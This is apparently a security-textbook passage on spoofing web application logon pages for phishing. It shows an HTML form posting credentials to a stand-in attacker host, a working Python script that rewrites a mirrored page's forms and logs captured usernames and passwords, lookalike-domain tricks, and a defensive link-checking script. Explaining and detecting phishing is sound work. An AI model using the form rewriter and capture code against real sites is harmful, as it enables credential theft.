Spoofing Web Applications

Risk Rating:

Organizations can present any number of different types of web applications openly to the Internet, including Internet banking applications, web mail services, and SSL VPNs. Each web application produces its own set of risks to an organization if compromised. Let's say that our target organization is running an SSL VPN that employees authenticate to from home to gain remote access to their respective servers and files.

Since the web application is open to the Internet, an attacker can mirror its logon page and host the copy on his or her own web server. The simplest way to do this is to browse to the logon page and use the browser's Save As ... option, choosing the complete web page format; this saves the HTML source and the images, style sheets and scripts it references into a directory on the local disk. The same can be done from Linux with wget (for example, wget -p -k to fetch the page's requisites and rewrite the links so the copy renders offline) or, for a single page, with curl.

Once the logon page is mirrored onto the attacker's web server, the attacker needs to alter the HTML source so that it performs the required action. This may be as simple as changing the action attribute of the login form so that the authentication credentials are posted to a program on the attacker's web server rather than to the organization's:

<FORM action="http://www.malicious_site.com/capture.php" method=POST>

This capture.php program may append the credentials to a file or email them to the attacker, and typically then forwards the victim to the real site so that the failed login attracts little attention. The spoofed website can then be used to extend an identity spoofing attack, such as the one just described; this type of attack is commonly referred to as a phishing attack. One way of carrying it out is to send an HTML email containing a link that, at face value, appears to point to the organization's web application; within the HTML source, however, the href actually points to the attacker's phishing website:

<a href="http://www.malicious_site.com/spoofed.php">Click Here</a>

An example of a spoofed email containing the link is shown in Figure 13-14, where the link Click Here points to the phishing website.
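As an added example (not code from the original text), the following Python script performs the form-rewriting step described above on a constructed stand-in for a mirrored logon page, and includes a stand-in for capture.php written as a Python function rather than PHP. The hostnames, paths, form fields and HTML are assumptions made for the illustration; the only real behaviour demonstrated is rewriting every form's action to the capture URL (keeping the original action in a hidden field so the victim can be forwarded on) and recording the posted credentials.

```python
"""Attacker-side steps of a login-page spoof: rewrite the mirrored page's
form action and capture what is posted. Added example; all names below
(malicious_site.com, /remote/login, capture.php) are constructed."""
from html.parser import HTMLParser
from urllib.parse import parse_qs

CAPTURE_URL = "http://www.malicious_site.com/capture.php"  # assumed attacker endpoint

# Constructed stand-in for a mirrored SSL VPN logon page.
MIRRORED_PAGE = """<html><body>
<form action="/remote/login" method="POST" name="vpnlogin">
<input type="text" name="username">
<input type="password" name="password">
<input type="submit" value="Login">
</form>
</body></html>"""


class FormRewriter(HTMLParser):
    """Re-emit the document unchanged except that every <form> gets its
    action replaced; the original action is kept in a hidden field so the
    capture endpoint knows where to forward the victim afterwards."""

    def __init__(self, capture_url):
        super().__init__(convert_charrefs=False)
        self.capture_url = capture_url
        self.out = []
        self.rewritten = 0

    def handle_starttag(self, tag, attrs):
        if tag != "form":
            self.out.append(self.get_starttag_text())  # pass through verbatim
            return
        original_action = "/"
        new_attrs = []
        for name, value in attrs:
            if name == "action":
                original_action = value or "/"
                value = self.capture_url
            new_attrs.append((name, value))
        if "action" not in dict(attrs):  # form posted to its own URL
            new_attrs.append(("action", self.capture_url))
        attr_text = "".join(f' {n}="{v}"' if v is not None else f" {n}" for n, v in new_attrs)
        self.out.append(f"<form{attr_text}>")
        self.out.append(f'<input type="hidden" name="_next" value="{original_action}">')
        self.rewritten += 1

    def handle_startendtag(self, tag, attrs):
        self.out.append(self.get_starttag_text())

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(data)

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")

    def handle_comment(self, data):
        self.out.append(f"<!--{data}-->")

    def handle_decl(self, decl):
        self.out.append(f"<!{decl}>")


def rewrite_forms(html, capture_url=CAPTURE_URL):
    """Return (rewritten HTML, number of forms redirected to the capture URL)."""
    parser = FormRewriter(capture_url)
    parser.feed(html)
    parser.close()
    return "".join(parser.out), parser.rewritten


def capture(body, log_path=None):
    """Stand-in for capture.php: parse the posted form body, record the
    credentials (appending to log_path if one is given) and return the
    address the victim should be forwarded to, plus the logged record."""
    fields = parse_qs(body)
    record = "{}:{}".format(fields.get("username", [""])[0], fields.get("password", [""])[0])
    if log_path:
        with open(log_path, "a") as f:
            f.write(record + "\n")
    return fields.get("_next", ["/"])[0], record


if __name__ == "__main__":
    page, count = rewrite_forms(MIRRORED_PAGE)
    print(f"rewrote {count} form(s):\n{page}")
    print(capture("username=alice&password=s3cret&_next=%2Fremote%2Flogin"))
```

Running the script prints the altered page with the form now posting to capture.php and shows the capture handler returning the original /remote/login target together with the alice:s3cret record it would append to its log.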

The main drawback of these attacks is that in many cases the browser's address bar shows the attacker's URL, www.malicious_site.com, which may alert a victim. In practice, attackers tend either to register a domain name that resembles the target organization's with a slight modification, such as www.organizati0n.com (a zero in place of the letter o), or simply to create a subdomain under a domain they already own, such as organization.com.malicious_site.com, which a casual reader may take for the organization's site.

The attacker's URL may also be hidden by having the link in the email open a new browser window without an address bar, or, where the organization's own website has a vulnerability such as cross-site scripting, by delivering the fake login form through that flaw, so that the organization's genuine domain name appears in the address bar while the content is the attacker's.
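As an added example (not code from the original text), the following Python check looks at the disguises just described from the defender's side: a lookalike registered domain such as www.organizati0n.com, the organization's name used as a subdomain of a domain the attacker owns, and link text that names a different host than the href it wraps. The organization name, the sample links and the list of confusable characters are constructed for the illustration, and the registrable-domain logic is a deliberate simplification (last two labels) rather than a Public Suffix List lookup.

```python
"""Classify the hosts behind links in a suspected phishing email.
Added example; organization.com, malicious_site.com and the sample links
are constructed, and registrable_domain() is a stated simplification."""
from urllib.parse import urlparse

# Substitutions used to build lookalike names (assumed, non-exhaustive list).
CONFUSABLES = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a", "5": "s", "7": "t"})


def registrable_domain(host):
    """Naive eTLD+1: the last two labels. An assumption for this example;
    production code should consult the Public Suffix List instead."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def unconfuse(name):
    """Map digit and letter-pair look-alikes back to the letters they imitate."""
    return name.translate(CONFUSABLES).replace("rn", "m").replace("vv", "w")


def classify_host(host, org_domain):
    """Decide how a link's hostname relates to the organization's real domain."""
    host, org = host.lower(), org_domain.lower()
    if host == org or host.endswith("." + org):
        return "legitimate"
    reg = registrable_domain(host)
    if ("." + org + ".") in ("." + host + "."):
        return "subdomain-of:" + reg       # e.g. organization.com.malicious_site.com
    if unconfuse(reg) == unconfuse(org):
        return "lookalike-of:" + org       # e.g. organizati0n.com
    return "unrelated"


def check_link(href, link_text, org_domain):
    """Return (host verdict, text_mismatch). text_mismatch is True when the
    visible link text names a host other than the one the href goes to."""
    target = urlparse(href).hostname or ""
    verdict = classify_host(target, org_domain)
    text = link_text.strip()
    shown = urlparse(text if "://" in text else "http://" + text).hostname or ""
    text_mismatch = "." in shown and shown.lower() != target.lower()
    return verdict, text_mismatch


# Constructed sample of (href, visible text) pairs from a phishing email.
SAMPLE_LINKS = [
    ("http://www.malicious_site.com/spoofed.php", "Click Here"),
    ("http://www.organizati0n.com/remote/login", "https://www.organization.com/remote/login"),
    ("http://organization.com.malicious_site.com/remote/login", "organization.com"),
    ("https://vpn.organization.com/remote/login", "Click Here"),
]


def audit(links, org_domain="organization.com"):
    """Run check_link over every link and return (href, verdict, text_mismatch) rows."""
    return [(href, *check_link(href, text, org_domain)) for href, text in links]


if __name__ == "__main__":
    for row in audit(SAMPLE_LINKS):
        print(row)
```

Only the last sample link is reported as legitimate; the first is unrelated (the plain Click Here trick), the second is a digit-substitution lookalike whose visible text also contradicts its target, and the third is the organization's name parked as a subdomain of malicious_site.com. Internationalized (punycode) hostnames and single-label or multi-label public suffixes are outside what this simplified check handles.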
